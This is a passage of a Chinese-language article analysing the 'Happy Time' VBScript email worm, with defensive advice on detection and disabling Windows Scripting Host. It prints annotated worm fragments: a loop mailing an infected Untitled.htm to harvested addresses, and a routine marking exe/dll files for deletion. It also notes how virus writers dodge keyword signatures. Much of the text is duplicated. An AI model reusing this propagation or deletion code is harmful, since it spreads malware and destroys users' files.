欢乐时光代码分析(3)
作者:佚名; 更新时间:2014-12-05
MsgSubject
End If
Next
For Each m In Od.Keys
MM.Compose
MM.MsgSubject = "Fw: " & Od.Item(m)
’设置邮件标题
MM.RecipAddress = m
’此邮件的当前的目标邮件地址
MM.AttachmentPathName = Gsf & "\Untitled.htm"
’添加附件Windows\Untitled.htm
MM.Send
’发送!
Next
MS.SignOff
End Sub
’******************************************************************
Function Er()
’设置的错误陷阱,避免程序崩溃,严谨的风格值得学习
If Err.Number = 0 Then
Er = False
Else
Err.Clear
Er = True
End If
End Function
’******************************************************************
Function IsDel(S)
’此函数查看当前文件是否是要删除的文件类型
If Mid(S, 4, 1) = 1 Then
’看S的第四个字符是否是1——即是0001(exe和dll)
IsDel = True
’如是,返回True,以备删除
Else
IsDel = False
’如不是,返回False
End If
End Function
’******************************************************************
于安全上的考虑,上面只登出了技术上比较新颖和重要的几个模块供大家研究和学习之用。从代码中大家可以看到,“欢乐时光”也采用了“爱虫”的FileSystemObject(文件系统对象)的技术,这也几乎是所有VBS邮件病毒必不可少的部分。因此如果杀毒软件监视所有Html和Vbs中的FileSystemObject关键字,几乎可以查出所有和潜在的变种(虽然可能会将某些良性的超文本和Vbs误报,但还是“宁可错杀一千,不可放过一毒”。如果仅监视关键字,如“爱虫”的“I love you”,“欢乐时光”的“Happy Time",造毒者只要将其改掉即可,再将邮件标题、内容和源码中的变量名替换一下,具有“智能查毒”的杀毒软件们也只有装聋作哑,望毒兴叹了。
如果您使用的是Foxmail 3.x,恭喜您啦!Foxmail 3.0以上的版本都严格地将文本邮件和超文本邮件加以区分,默认超文本邮件需要点击右角上的小地球图标才可以看到超文本,如果您怀疑某封信可能带毒,就可以从容删之,或导出成ASCII文件用记事本打开研究研究。而老Foxmail和Outlook Express就没那么幸运,即一看到标题就已Bingo,OE还会成为散毒源,寄发带毒邮件。因此首先,最好使用Foxmail 3.x,安全第一嘛!如果不放心,干脆删掉WSH(Windows Scripting Host)吧!方法是找到"添加/删除程序"->"Windows安装程序"--"附件" ,将"组件"中的"Windows Scripting Host"所占空间1.1MB前面的勾去掉,然后选"确定"即可。如果你想研究其源码,用Foxmail导出为文本文件即可,“知己知彼,百战不殆”嘛!
End If
Next
For Each m In Od.Keys
MM.Compose
MM.MsgSubject = "Fw: " & Od.Item(m)
’设置邮件标题
MM.RecipAddress = m
’此邮件的当前的目标邮件地址
MM.AttachmentPathName = Gsf & "\Untitled.htm"
’添加附件Windows\Untitled.htm
MM.Send
’发送!
Next
MS.SignOff
End Sub
’******************************************************************
Function Er()
’设置的错误陷阱,避免程序崩溃,严谨的风格值得学习
If Err.Number = 0 Then
Er = False
Else
Err.Clear
Er = True
End If
End Function
’******************************************************************
Function IsDel(S)
’此函数查看当前文件是否是要删除的文件类型
If Mid(S, 4, 1) = 1 Then
’看S的第四个字符是否是1——即是0001(exe和dll)
IsDel = True
’如是,返回True,以备删除
Else
IsDel = False
’如不是,返回False
End If
End Function
’******************************************************************
于安全上的考虑,上面只登出了技术上比较新颖和重要的几个模块供大家研究和学习之用。从代码中大家可以看到,“欢乐时光”也采用了“爱虫”的FileSystemObject(文件系统对象)的技术,这也几乎是所有VBS邮件病毒必不可少的部分。因此如果杀毒软件监视所有Html和Vbs中的FileSystemObject关键字,几乎可以查出所有和潜在的变种(虽然可能会将某些良性的超文本和Vbs误报,但还是“宁可错杀一千,不可放过一毒”。如果仅监视关键字,如“爱虫”的“I love you”,“欢乐时光”的“Happy Time",造毒者只要将其改掉即可,再将邮件标题、内容和源码中的变量名替换一下,具有“智能查毒”的杀毒软件们也只有装聋作哑,望毒兴叹了。
如果您使用的是Foxmail 3.x,恭喜您啦!Foxmail 3.0以上的版本都严格地将文本邮件和超文本邮件加以区分,默认超文本邮件需要点击右角上的小地球图标才可以看到超文本,如果您怀疑某封信可能带毒,就可以从容删之,或导出成ASCII文件用记事本打开研究研究。而老Foxmail和Outlook Express就没那么幸运,即一看到标题就已Bingo,OE还会成为散毒源,寄发带毒邮件。因此首先,最好使用Foxmail 3.x,安全第一嘛!如果不放心,干脆删掉WSH(Windows Scripting Host)吧!方法是找到"添加/删除程序"->"Windows安装程序"--"附件" ,将"组件"中的"Windows Scripting Host"所占空间1.1MB前面的勾去掉,然后选"确定"即可。如果你想研究其源码,用Foxmail导出为文本文件即可,“知己知彼,百战不殆”嘛!
下一篇:高校新校区智能化建设常见问题探讨
热门论文